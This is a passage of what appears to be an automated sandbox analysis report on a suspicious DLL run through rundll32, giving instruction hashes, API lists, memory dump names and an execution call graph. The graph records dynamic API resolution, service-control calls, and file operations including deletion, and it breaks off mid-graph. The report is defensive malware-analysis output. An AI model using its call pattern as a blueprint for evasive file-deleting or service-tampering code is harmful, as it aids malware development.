                                                                                                                                  • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                                  • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                  • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 100206C8 Relevance: 5.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                  • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                  • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                  • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3969253408-0
                                                                                                                                  • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                  • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                  • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                  • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:15.7%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:1080
                                                                                                                                  Total number of Limit Nodes:17
                                                                                                                                  execution_graph 3982 302950 3987 312550 3982->3987 3986 302a1a 4025 313775 3987->4025 3995 31e1d4 RtlAllocateHeap GetPEB 3995->4025 3996 313ff6 4246 317dd5 3996->4246 3997 313fe1 4239 3091b0 3997->4239 4002 313fbb 4228 31cb5b 4002->4228 4005 302a06 4026 3093ed 4005->4026 4007 318519 GetPEB 4007->4025 4020 317ba6 RtlAllocateHeap GetPEB 4020->4025 4024 30a8b0 GetPEB 4024->4025 4025->3995 4025->3996 4025->3997 4025->4002 4025->4005 4025->4007 4025->4020 4025->4024 4029 3120ba 4025->4029 4039 314116 4025->4039 4047 310326 4025->4047 4051 3059f2 4025->4051 4061 3195fa 4025->4061 4072 31044f 4025->4072 4086 315cc4 4025->4086 4099 3187d1 4025->4099 4104 3064e2 4025->4104 4114 31473c 4025->4114 4121 305361 4025->4121 4129 311ddd 4025->4129 4133 320056 4025->4133 4144 3166ca 4025->4144 4154 302251 4025->4154 4161 30b2c7 4025->4161 4173 311ee7 4025->4173 4176 319eec 4025->4176 4185 3051bb 4025->4185 4190 318be3 4025->4190 4194 30dff3 4025->4194 4201 317d48 4025->4201 4204 31d2ce 4025->4204 4209 308dc4 4025->4209 4213 306d24 4025->4213 4222 319bcf 4025->4222 4027 31aa30 GetPEB 4026->4027 4028 309456 ExitProcess 4027->4028 4028->3986 4037 3123c3 4029->4037 4030 312503 4284 31da22 4030->4284 4036 312501 4036->4025 4037->4030 4037->4036 4260 318f9e 4037->4260 4264 3146bb 4037->4264 4268 30912c 4037->4268 4272 307ff2 4037->4272 4277 30a55f 4037->4277 4040 3143df 4039->4040 4043 314508 4040->4043 4045 31da22 GetPEB 4040->4045 4337 309350 4040->4337 4341 311e67 4040->4341 4345 308f65 4040->4345 4349 31c1ec 4040->4349 4043->4025 4045->4040 4048 310340 4047->4048 4049 31044a 4048->4049 4050 309011 RtlAllocateHeap GetPEB LoadLibraryW 4048->4050 4049->4025 4050->4048 4058 305caf 4051->4058 4053 305db3 4367 303c3c 4053->4367 4055 31da22 GetPEB 4055->4058 4056 305db1 4056->4025 4058->4053 4058->4055 4058->4056 4353 3213ad 4058->4353 4377 31dcf7 4058->4377 4381 3047ce 4058->4381 4385 30a8b0 4058->4385 4069 3199cc 4061->4069 4063 31dcf7 2 API calls 4063->4069 4064 319ba9 4066 311e67 2 API calls 4064->4066 4065 319ba7 4065->4025 4066->4065 4067 308f65 2 API calls 4067->4069 4068 3047ce GetPEB 4068->4069 4069->4063 4069->4064 4069->4065 4069->4067 4069->4068 4070 30a8b0 GetPEB 4069->4070 4071 31c1ec GetPEB 4069->4071 4426 305ddd 4069->4426 4070->4069 4071->4069 4075 310859 4072->4075 4074 31dcf7 2 API calls 4074->4075 4075->4074 4076 3109d9 4075->4076 4077 307ff2 RtlAllocateHeap GetPEB 4075->4077 4080 310894 4075->4080 4084 30a8b0 GetPEB 4075->4084 4085 3108b3 4075->4085 4430 309462 4075->4430 4434 310dd6 4075->4434 4078 318519 GetPEB 4076->4078 4077->4075 4081 3109ec 4078->4081 4438 30957d 4080->4438 4083 318519 GetPEB 4081->4083 4083->4085 4084->4075 4085->4025 4097 3163a1 4086->4097 4087 318f9e 2 API calls 4087->4097 4089 316521 4091 318f9e 2 API calls 4089->4091 4090 31dcf7 2 API calls 4090->4097 4092 316543 4091->4092 4092->4025 4094 3146bb 2 API calls 4094->4097 4095 30912c 2 API calls 4095->4097 4097->4087 4097->4089 4097->4090 4097->4092 4097->4094 4097->4095 4098 30a8b0 GetPEB 4097->4098 4442 30d6d8 4097->4442 4455 301cec 4097->4455 4459 311652 4097->4459 4098->4097 4100 31888d 4099->4100 4103 318935 4100->4103 4482 30ee08 4100->4482 4486 31ab5e 4100->4486 4103->4025 4111 30651f 4104->4111 4106 318519 GetPEB 4106->4111 4107 304b61 GetPEB 4107->4111 4110 306bd9 4110->4025 4111->4106 4111->4107 4111->4110 4490 31a666 4111->4490 4500 31f435 4111->4500 4518 30cf47 4111->4518 4530 305548 4111->4530 4539 31e395 4111->4539 4118 314a28 4114->4118 4115 318f9e GetPEB CloseServiceHandle 4115->4118 4116 30912c 2 API calls 4116->4118 4117 314b7d 4117->4025 4118->4115 4118->4116 4118->4117 4120 3042c4 2 API calls 4118->4120 4704 30e249 4118->4704 4120->4118 4125 30537b 4121->4125 4122 318519 GetPEB 4122->4125 4123 307ff2 2 API calls 4123->4125 4125->4122 4125->4123 4126 30553e 4125->4126 4708 30960d 4125->4708 4712 320f33 4125->4712 4722 30924b 4125->4722 4126->4025 4130 311df2 4129->4130 4131 31aa30 GetPEB 4130->4131 4132 311e5c 4131->4132 4132->4025 4143 320720 4133->4143 4135 31dcf7 RtlAllocateHeap GetPEB 4135->4143 4136 30cb52 GetPEB 4136->4143 4137 3146bb 2 API calls 4137->4143 4139 3209a3 4139->4025 4141 30a8b0 GetPEB 4141->4143 4142 311652 GetPEB 4142->4143 4143->4135 4143->4136 4143->4137 4143->4139 4143->4141 4143->4142 4817 30f002 4143->4817 4821 30aad6 4143->4821 4825 301fd1 4143->4825 4829 315c73 4144->4829 4146 3213ad 2 API calls 4152 316a65 4146->4152 4147 316bbb 4147->4025 4148 31d25e GetPEB 4148->4152 4149 31dcf7 RtlAllocateHeap GetPEB 4149->4152 4151 3047ce GetPEB 4151->4152 4152->4146 4152->4147 4152->4148 4152->4149 4152->4151 4153 30a8b0 GetPEB 4152->4153 4832 31453f 4152->4832 4153->4152 4158 30227a 4154->4158 4155 302918 4156 320e3a GetPEB 4155->4156 4157 302916 4156->4157 4157->4025 4158->4155 4158->4157 4159 320e3a GetPEB 4158->4159 4160 307ff2 2 API calls 4158->4160 4159->4158 4160->4158 4163 30b2df 4161->4163 4162 307ff2 2 API calls 4162->4163 4163->4162 4170 30b6c2 4163->4170 4836 310b19 4163->4836 4843 310e53 4163->4843 4855 316df8 4163->4855 4876 314b87 4163->4876 4897 30f09b 4163->4897 4909 309714 4163->4909 4917 311889 4163->4917 4928 30b74d 4163->4928 4170->4025 4174 308dc4 GetPEB 4173->4174 4175 311f83 4174->4175 4175->4025 4180 31a152 4176->4180 4178 318519 GetPEB 4178->4180 4180->4178 4182 31a2de 4180->4182 5055 30f899 4180->5055 5058 30a9ce 4180->5058 5062 308ece 4180->5062 5066 304346 4180->5066 5073 304e7d 4180->5073 4182->4025 4189 305275 4185->4189 4187 307ff2 2 API calls 4187->4189 4188 3052b8 4188->4025 4189->4187 4189->4188 5081 310001 4189->5081 4191 318e25 4190->4191 4192 31d25e GetPEB 4191->4192 4193 318ef1 4191->4193 4192->4191 4193->4025 4200 30e1a7 4194->4200 4195 30e207 4197 3046be GetPEB 4195->4197 4196 307ff2 2 API calls 4196->4200 4199 30e205 4197->4199 4199->4025 4200->4195 4200->4196 4200->4199 5110 307af6 4200->5110 4202 307ff2 2 API calls 4201->4202 4203 317dc1 4202->4203 4203->4025 4205 315c73 GetPEB 4204->4205 4206 31d370 4205->4206 5114 318b55 4206->5114 4210 308ddd 4209->4210 4211 31aa30 GetPEB 4210->4211 4212 308e3e 4211->4212 4212->4025 4221 306f44 4213->4221 4214 306ffc 5118 309dcf 4214->5118 4215 30b6cf GetPEB 4215->4221 4217 306ffa 4217->4025 4218 31dcf7 2 API calls 4218->4221 4219 3047ce GetPEB 4219->4221 4220 30a8b0 GetPEB 4220->4221 4221->4214 4221->4215 4221->4217 4221->4218 4221->4219 4221->4220 4225 319d3b 4222->4225 4223 319e49 4223->4025 4224 30b6cf GetPEB 4224->4225 4225->4223 4225->4224 5141 3052c2 4225->5141 5144 309b83 4225->5144 4229 31cb83 4228->4229 4230 31dcf7 RtlAllocateHeap GetPEB 4229->4230 4231 31d0a6 4229->4231 4232 3146bb 2 API calls 4229->4232 4233 31d259 4229->4233 4236 311652 GetPEB 4229->4236 4238 30a8b0 GetPEB 4229->4238 5182 31e32e 4229->5182 4230->4229 4234 30ab87 3 API calls 4231->4234 4232->4229 4233->4233 4235 31d0d0 4234->4235 4235->4005 4236->4229 4238->4229 4244 3091be 4239->4244 4240 310da3 4240->4005 4241 308dc4 GetPEB 4241->4244 4242 318519 GetPEB 4242->4244 4243 319e56 GetPEB 4243->4244 4244->4240 4244->4241 4244->4242 4244->4243 4245 311e67 2 API calls 4244->4245 4245->4244 4252 318118 4246->4252 4248 318245 4248->4005 4249 31dcf7 2 API calls 4249->4252 4250 318247 4251 30b6cf GetPEB 4250->4251 4255 31825f 4251->4255 4252->4248 4252->4249 4252->4250 4253 3213ad 2 API calls 4252->4253 4254 3047ce GetPEB 4252->4254 4256 31473c 4 API calls 4252->4256 4259 30a8b0 GetPEB 4252->4259 5186 303e3f 4252->5186 5195 316c49 4252->5195 4253->4252 4254->4252 5202 30b1c6 4255->5202 4256->4252 4259->4252 4261 318fb3 4260->4261 4288 31aa30 4261->4288 4265 3146da 4264->4265 4266 31aa30 GetPEB 4265->4266 4267 314729 SHGetFolderPathW 4266->4267 4267->4037 4269 309149 4268->4269 4270 31aa30 GetPEB 4269->4270 4271 3091a2 OpenSCManagerW 4270->4271 4271->4037 4318 301db9 4272->4318 4276 3080db 4276->4037 4283 30a73c 4277->4283 4279 30a7f0 4329 303bc0 4279->4329 4280 31da22 GetPEB 4280->4283 4282 30a7ee 4282->4037 4283->4279 4283->4280 4283->4282 4325 30cb52 4283->4325 4285 31da3d 4284->4285 4333 31adc9 4285->4333 4289 318ffc CloseServiceHandle 4288->4289 4290 31ab1d 4288->4290 4289->4037 4294 310a0e 4290->4294 4292 31ab33 4297 30cdcd 4292->4297 4301 314087 GetPEB 4294->4301 4296 310aa6 4296->4292 4299 30cdec 4297->4299 4298 30cf0f 4298->4289 4299->4298 4302 31be27 4299->4302 4301->4296 4303 31bfb1 4302->4303 4310 30ade6 4303->4310 4306 31bff5 4308 30cdcd GetPEB 4306->4308 4309 31c029 4306->4309 4308->4309 4309->4298 4311 30adfa 4310->4311 4312 31aa30 GetPEB 4311->4312 4313 30ae57 4312->4313 4313->4306 4314 31cadf 4313->4314 4315 31caf5 4314->4315 4316 31aa30 GetPEB 4315->4316 4317 31cb50 4316->4317 4317->4306 4319 31aa30 GetPEB 4318->4319 4320 301e19 4319->4320 4321 301e22 4320->4321 4322 301e3d 4321->4322 4323 31aa30 GetPEB 4322->4323 4324 301e96 RtlAllocateHeap 4323->4324 4324->4276 4326 30cb6b 4325->4326 4327 31aa30 GetPEB 4326->4327 4328 30cbd4 4327->4328 4328->4283 4330 303bd8 4329->4330 4331 31aa30 GetPEB 4330->4331 4332 303c2d 4331->4332 4332->4282 4334 31adee 4333->4334 4335 31aa30 GetPEB 4334->4335 4336 31ae5d 4335->4336 4336->4036 4338 309371 4337->4338 4339 31aa30 GetPEB 4338->4339 4340 3093db 4339->4340 4340->4040 4342 311e7d 4341->4342 4343 31aa30 GetPEB 4342->4343 4344 311edb CloseHandle 4343->4344 4344->4040 4346 308f90 4345->4346 4347 31aa30 GetPEB 4346->4347 4348 308ff5 CreateFileW 4347->4348 4348->4040 4350 31c1fb 4349->4350 4351 31aa30 GetPEB 4350->4351 4352 31c258 4351->4352 4352->4040 4354 3213cb 4353->4354 4389 304b61 4354->4389 4357 304b61 GetPEB 4358 321637 4357->4358 4359 304b61 GetPEB 4358->4359 4360 32164d 4359->4360 4361 303bc0 GetPEB 4360->4361 4362 321666 4361->4362 4363 303bc0 GetPEB 4362->4363 4364 321681 4363->4364 4393 304ddd 4364->4393 4366 3216bf 4366->4058 4368 303c56 4367->4368 4369 31dcf7 2 API calls 4368->4369 4370 303d7a 4369->4370 4405 30a918 4370->4405 4373 30a8b0 GetPEB 4374 303da2 4373->4374 4409 311f8a 4374->4409 4376 303db4 4376->4056 4378 31dd0c 4377->4378 4379 307ff2 2 API calls 4378->4379 4380 31dd93 4379->4380 4380->4058 4380->4380 4382 3047f3 4381->4382 4383 30a42d GetPEB 4382->4383 4384 30480e 4383->4384 4384->4058 4386 30a8c2 4385->4386 4416 318519 4386->4416 4390 304b74 4389->4390 4397 301ea7 4390->4397 4394 304df6 4393->4394 4395 31aa30 GetPEB 4394->4395 4396 304e69 SHFileOperationW 4395->4396 4396->4366 4398 301ebc 4397->4398 4401 30702c 4398->4401 4402 307049 4401->4402 4403 31aa30 GetPEB 4402->4403 4404 301f4c 4403->4404 4404->4357 4406 30a936 4405->4406 4413 30a42d 4406->4413 4410 311f99 4409->4410 4411 31aa30 GetPEB 4410->4411 4412 311fef DeleteFileW 4411->4412 4412->4376 4414 31aa30 GetPEB 4413->4414 4415 303d95 4414->4415 4415->4373 4417 318529 4416->4417 4418 301db9 GetPEB 4417->4418 4419 3185ed 4418->4419 4422 30a30c 4419->4422 4423 30a326 4422->4423 4424 31aa30 GetPEB 4423->4424 4425 30a392 4424->4425 4425->4058 4427 305dff 4426->4427 4428 31aa30 GetPEB 4427->4428 4429 305e4f SetFileInformationByHandle 4428->4429 4429->4069 4431 309481 4430->4431 4432 31aa30 GetPEB 4431->4432 4433 3094da 4432->4433 4433->4075 4435 310df7 4434->4435 4436 31aa30 GetPEB 4435->4436 4437 310e3f 4436->4437 4437->4075 4439 309595 4438->4439 4440 31aa30 GetPEB 4439->4440 4441 3095ff 4440->4441 4441->4085 4451 30d70e 4442->4451 4443 30df52 4446 318519 GetPEB 4443->4446 4444 307ff2 RtlAllocateHeap GetPEB 4444->4451 4445 318519 GetPEB 4445->4451 4448 30df63 4446->4448 4448->4097 4451->4443 4451->4444 4451->4445 4451->4448 4452 318f9e 2 API calls 4451->4452 4463 3042c4 4451->4463 4467 312007 4451->4467 4471 3116af 4451->4471 4475 31d25e 4451->4475 4478 30df6f 4451->4478 4452->4451 4456 301d2d 4455->4456 4457 31aa30 GetPEB 4456->4457 4458 301d93 4457->4458 4458->4097 4460 311680 4459->4460 4461 30a42d GetPEB 4460->4461 4462 3116a7 4461->4462 4462->4097 4464 3042e2 4463->4464 4465 31aa30 GetPEB 4464->4465 4466 304335 OpenServiceW 4465->4466 4466->4451 4468 312033 4467->4468 4469 31aa30 GetPEB 4468->4469 4470 31209a 4469->4470 4470->4451 4472 3116f3 4471->4472 4473 31aa30 GetPEB 4472->4473 4474 31174d 4473->4474 4474->4451 4476 31aa30 GetPEB 4475->4476 4477 31d2c5 4476->4477 4477->4451 4479 30df8a 4478->4479 4480 31aa30 GetPEB 4479->4480 4481 30dfe1 4480->4481 4481->4451 4483 30ee1a 4482->4483 4484 31aa30 GetPEB 4483->4484 4485 30ee76 4484->4485 4485->4100 4487 31ab70 4486->4487 4488 31aa30 GetPEB 4487->4488 4489 31abc6 4488->4489 4489->4100 4498 31a8cb 4490->4498 4492 31dcf7 2 API calls 4492->4498 4493 30a42d GetPEB 4493->4498 4494 31aa14 4496 318519 GetPEB 4494->4496 4495 31aa12 4495->4111 4496->4495 4497 307ff2 2 API calls 4497->4498 4498->4492 4498->4493 4498->4494 4498->4495 4498->4497 4499 30a8b0 GetPEB 4498->4499 4556 304816 4498->4556 4499->4498 4509 31fc7c 4500->4509 4501 31ffc3 4502 318606 2 API calls 4501->4502 4504 31ffe0 4502->4504 4503 307ff2 RtlAllocateHeap GetPEB 4503->4509 4579 307f1d 4504->4579 4506 32003a 4510 318519 GetPEB 4506->4510 4508 31dcf7 2 API calls 4508->4509 4509->4501 4509->4503 4509->4506 4509->4508 4514 30a42d GetPEB 4509->4514 4515 31ffb1 4509->4515 4517 30a8b0 GetPEB 4509->4517 4567 318606 4509->4567 4571 31c0c1 4509->4571 4575 30ed7e 4509->4575 4510->4515 4513 30a8b0 GetPEB 4513->4515 4514->4509 4515->4111 4517->4509 4529 30cf7e 4518->4529 4520 318519 GetPEB 4520->4529 4523 30d58f 4525 318519 GetPEB 4523->4525 4526 30d5a6 4525->4526 4526->4111 4527 307ff2 2 API calls 4527->4529 4528 30ed7e GetPEB 4528->4529 4529->4520 4529->4523 4529->4526 4529->4527 4529->4528 4587 307735 4529->4587 4594 307e87 4529->4594 4598 31ae6d 4529->4598 4613 3070b3 4529->4613 4537 305577 4530->4537 4532 305969 4534 318519 GetPEB 4532->4534 4533 305967 4533->4111 4534->4533 4535 307ff2 2 API calls 4535->4537 4537->4532 4537->4533 4537->4535 4538 30ed7e GetPEB 4537->4538 4644 305e60 4537->4644 4650 30aefb 4537->4650 4538->4537 4555 31e406 4539->4555 4540 31f410 4692 302b62 4540->4692 4542 31dcf7 2 API calls 4542->4555 4543 31f426 4543->4111 4548 30a8b0 GetPEB 4548->4555 4550 302b62 GetPEB 4550->4555 4551 318519 GetPEB 4551->4555 4553 309670 GetPEB 4553->4555 4555->4540 4555->4542 4555->4543 4555->4548 4555->4550 4555->4551 4555->4553 4660 31dac6 4555->4660 4664 3088c3 4555->4664 4668 3075fa 4555->4668 4672 31408e 4555->4672 4676 302ae4 4555->4676 4680 3209b5 4555->4680 4683 31a2e8 4555->4683 4557 304836 4556->4557 4559 304b23 4557->4559 4561 304b21 4557->4561 4562 307ff2 2 API calls 4557->4562 4563 31847f 4557->4563 4560 31847f GetPEB 4559->4560 4560->4561 4561->4498 4562->4557 4564 3184a6 4563->4564 4565 31aa30 GetPEB 4564->4565 4566 318502 4565->4566 4566->4557 4568 31861f 4567->4568 4569 307ff2 2 API calls 4568->4569 4570 3186bc 4569->4570 4570->4509 4572 31c0e6 4571->4572 4573 30a42d GetPEB 4572->4573 4574 31c108 4573->4574 4574->4509 4576 30ed97 4575->4576 4583 317a71 4576->4583 4580 307f39 4579->4580 4581 30a42d GetPEB 4580->4581 4582 307f55 4581->4582 4582->4513 4584 317a8a 4583->4584 4585 31aa30 GetPEB 4584->4585 4586 30ee00 4585->4586 4586->4509 4588 307764 4587->4588 4589 307ff2 2 API calls 4588->4589 4590 307a10 4588->4590 4591 3079f3 4588->4591 4592 320e3a GetPEB 4588->4592 4589->4588 4590->4529 4620 320e3a 4591->4620 4592->4588 4595 307e9a 4594->4595 4596 30ed7e GetPEB 4595->4596 4597 307f16 4596->4597 4597->4529 4599 31aea5 4598->4599 4602 31baf7 4599->4602 4604 307ff2 2 API calls 4599->4604 4606 31baf5 4599->4606 4608 31dcf7 RtlAllocateHeap GetPEB 4599->4608 4609 309462 GetPEB 4599->4609 4610 318519 GetPEB 4599->4610 4612 30a8b0 GetPEB 4599->4612 4624 320b68 4599->4624 4628 317b05 4599->4628 4632 316bc6 4599->4632 4636 30a81d 4599->4636 4640 31828a 4599->4640 4603 30957d GetPEB 4602->4603 4603->4606 4604->4599 4606->4529 4608->4599 4609->4599 4610->4599 4612->4599 4615 3070dc 4613->4615 4614 315b3b GetPEB 4614->4615 4615->4614 4616 3074a7 4615->4616 4617 307ff2 2 API calls 4615->4617 4619 3074bb 4615->4619 4618 318519 GetPEB 4616->4618 4617->4615 4618->4619 4619->4529 4621 320e58 4620->4621 4622 30ed7e GetPEB 4621->4622 4623 320f24 4622->4623 4623->4590 4625 320b97 4624->4625 4626 31aa30 GetPEB 4625->4626 4627 320bfc 4626->4627 4627->4599 4629 317b37 4628->4629 4630 31aa30 GetPEB 4629->4630 4631 317b8a 4630->4631 4631->4599 4633 316bda 4632->4633 4634 31aa30 GetPEB 4633->4634 4635 316c3d 4634->4635 4635->4599 4637 30a83f 4636->4637 4638 31aa30 GetPEB 4637->4638 4639 30a89d 4638->4639 4639->4599 4641 3182a9 4640->4641 4642 31aa30 GetPEB 4641->4642 4643 318300 4642->4643 4643->4599 4646 305e82 4644->4646 4645 318519 GetPEB 4645->4646 4646->4645 4647 307ff2 2 API calls 4646->4647 4648 3064bd 4646->4648 4649 30ca90 GetPEB 4646->4649 4647->4646 4648->4537 4649->4646 4651 30af1c 4650->4651 4652 31ae6d 2 API calls 4651->4652 4653 30b0b3 4651->4653 4655 30b0e8 4651->4655 4652->4651 4656 31e274 4653->4656 4655->4537 4657 31e2a0 4656->4657 4658 31aa30 GetPEB 4657->4658 4659 31e312 4658->4659 4659->4655 4661 31dae5 4660->4661 4662 31aa30 GetPEB 4661->4662 4663 31db32 4662->4663 4663->4555 4665 3088f5 4664->4665 4666 31aa30 GetPEB 4665->4666 4667 308950 4666->4667 4667->4555 4669 30762c 4668->4669 4670 31aa30 GetPEB 4669->4670 4671 307690 4670->4671 4671->4555 4673 3140b3 4672->4673 4674 31aa30 GetPEB 4673->4674 4675 314103 4674->4675 4675->4555 4677 302b04 4676->4677 4678 31aa30 GetPEB 4677->4678 4679 302b4b 4678->4679 4679->4555 4696 3094ee 4680->4696 4685 31a519 4683->4685 4684 307ff2 RtlAllocateHeap GetPEB 4684->4685 4685->4684 4687 31a634 4685->4687 4690 30ed7e GetPEB 4685->4690 4691 318519 GetPEB 4685->4691 4700 31c032 4685->4700 4688 31a64a 4687->4688 4689 318519 GetPEB 4687->4689 4688->4555 4689->4688 4690->4685 4691->4685 4693 302b77 4692->4693 4694 31aa30 GetPEB 4693->4694 4695 302bce 4694->4695 4695->4543 4697 309511 4696->4697 4698 31aa30 GetPEB 4697->4698 4699 309566 4698->4699 4699->4555 4701 31c054 4700->4701 4702 31aa30 GetPEB 4701->4702 4703 31c0ae 4702->4703 4703->4685 4705 30e262 4704->4705 4706 31aa30 GetPEB 4705->4706 4707 30e2c1 4706->4707 4707->4118 4709 309623 4708->4709 4726 318315 4709->4726 4714 3211d1 4712->4714 4713 31dcf7 2 API calls 4713->4714 4714->4713 4715 311652 GetPEB 4714->4715 4716 307ff2 2 API calls 4714->4716 4718 321380 4714->4718 4719 30a8b0 GetPEB 4714->4719 4721 321391 4714->4721 4813 317ba6 4714->4813 4715->4714 4716->4714 4720 318519 GetPEB 4718->4720 4719->4714 4720->4721 4721->4125 4723 3092c1 4722->4723 4724 3092ac 4722->4724 4723->4125 4724->4723 4725 318519 GetPEB 4724->4725 4725->4724 4732 31832d 4726->4732 4728 31845c 4731 318519 GetPEB 4728->4731 4730 30966a 4730->4125 4731->4730 4732->4728 4732->4730 4733 307ff2 2 API calls 4732->4733 4735 30bb7e 4732->4735 4752 304bc7 4732->4752 4757 31907f 4732->4757 4733->4732 4749 30c63d 4735->4749 4738 30ca5b 4740 30957d GetPEB 4738->4740 4743 30ca59 4740->4743 4741 30a958 GetPEB 4741->4749 4742 31dcf7 RtlAllocateHeap GetPEB 4742->4749 4743->4732 4745 309462 GetPEB 4745->4749 4748 30a8b0 GetPEB 4748->4749 4749->4738 4749->4741 4749->4742 4749->4743 4749->4745 4749->4748 4750 30ed7e GetPEB 4749->4750 4766 30aa4d 4749->4766 4770 30b144 4749->4770 4774 301c45 4749->4774 4778 314624 4749->4778 4782 3092c7 4749->4782 4786 31ca69 4749->4786 4790 302bd9 4749->4790 4750->4749 4753 31ca69 GetPEB 4752->4753 4754 304c44 4753->4754 4755 318519 GetPEB 4754->4755 4756 304c57 4755->4756 4756->4732 4763 31947b 4757->4763 4758 3195cb 4759 30957d GetPEB 4758->4759 4760 3195c9 4759->4760 4760->4732 4761 30aa4d GetPEB 4761->4763 4762 31dcf7 RtlAllocateHeap GetPEB 4762->4763 4763->4758 4763->4760 4763->4761 4763->4762 4764 309462 GetPEB 4763->4764 4765 30a8b0 GetPEB 4763->4765 4764->4763 4765->4763 4767 30aa76 4766->4767 4768 31aa30 GetPEB 4767->4768 4769 30aab9 4768->4769 4769->4749 4771 30b15f 4770->4771 4772 31aa30 GetPEB 4771->4772 4773 30b1b8 4772->4773 4773->4749 4775 301c76 4774->4775 4776 31aa30 GetPEB 4775->4776 4777 301cd0 4776->4777 4777->4749 4779 314646 4778->4779 4780 31aa30 GetPEB 4779->4780 4781 3146a8 4780->4781 4781->4749 4783 3092e5 4782->4783 4784 31aa30 GetPEB 4783->4784 4785 30933c 4784->4785 4785->4749 4787 31ca7b 4786->4787 4788 31aa30 GetPEB 4787->4788 4789 31cad4 4788->4789 4789->4749 4791 303757 4790->4791 4792 318519 GetPEB 4791->4792 4793 303a7d 4791->4793 4794 307ff2 2 API calls 4791->4794 4796 303bbb 4791->4796 4798 30cb52 GetPEB 4791->4798 4799 309462 GetPEB 4791->4799 4800 31dcf7 RtlAllocateHeap GetPEB 4791->4800 4802 320b68 GetPEB 4791->4802 4804 30a8b0 GetPEB 4791->4804 4805 31d84c 4791->4805 4809 308d13 4791->4809 4792->4791 4795 30957d GetPEB 4793->4795 4794->4791 4797 303aa2 4795->4797 4796->4796 4797->4749 4798->4791 4799->4791 4800->4791 4802->4791 4804->4791 4806 31d87f 4805->4806 4807 31aa30 GetPEB 4806->4807 4808 31d8ca 4807->4808 4808->4791 4810 308d41 4809->4810 4811 31aa30 GetPEB 4810->4811 4812 308da7 4811->4812 4812->4791 4814 317bbf 4813->4814 4815 307ff2 2 API calls 4814->4815 4816 317c88 4815->4816 4816->4714 4816->4816 4818 30f02e 4817->4818 4819 31aa30 GetPEB 4818->4819 4820 30f082 4819->4820 4820->4143 4822 30ab09 4821->4822 4823 31aa30 GetPEB 4822->4823 4824 30ab6d 4823->4824 4824->4143 4826 301fe3 4825->4826 4827 31aa30 GetPEB 4826->4827 4828 302045 4827->4828 4828->4143 4830 31aa30 GetPEB 4829->4830 4831 315cbb 4830->4831 4831->4152 4833 314567 4832->4833 4834 30a42d GetPEB 4833->4834 4835 314587 4834->4835 4835->4152 4840 310d2c 4836->4840 4837 310da3 4837->4163 4838 308dc4 GetPEB 4838->4840 4839 318519 GetPEB 4839->4840 4840->4837 4840->4838 4840->4839 4842 311e67 2 API calls 4840->4842 4936 319e56 4840->4936 4842->4840 4853 31144a 4843->4853 4844 3146bb 2 API calls 4844->4853 4845 311647 4845->4163 4846 31da22 GetPEB 4846->4853 4849 30a8b0 GetPEB 4849->4853 4850 31dcf7 RtlAllocateHeap GetPEB 4850->4853 4852 3047ce GetPEB 4852->4853 4853->4844 4853->4845 4853->4846 4853->4849 4853->4850 4853->4852 4944 30b6cf 4853->4944 4948 308969 4853->4948 4952 30ea99 4853->4952 4959 30ab87 4853->4959 4874 317703 4855->4874 4857 31d2ce GetPEB 4857->4874 4860 31da22 GetPEB 4860->4874 4861 317759 4863 30ab87 3 API calls 4861->4863 4862 311e67 CloseHandle GetPEB 4862->4874 4865 317789 4863->4865 4864 30b6cf GetPEB 4864->4874 4867 311e67 2 API calls 4865->4867 4871 3177d7 4865->4871 4866 308969 GetPEB 4866->4874 4868 3177b2 4867->4868 4870 311e67 2 API calls 4868->4870 4869 31dcf7 2 API calls 4869->4874 4870->4871 4871->4163 4872 3047ce GetPEB 4872->4874 4873 30a8b0 GetPEB 4873->4874 4874->4857 4874->4860 4874->4861 4874->4862 4874->4864 4874->4866 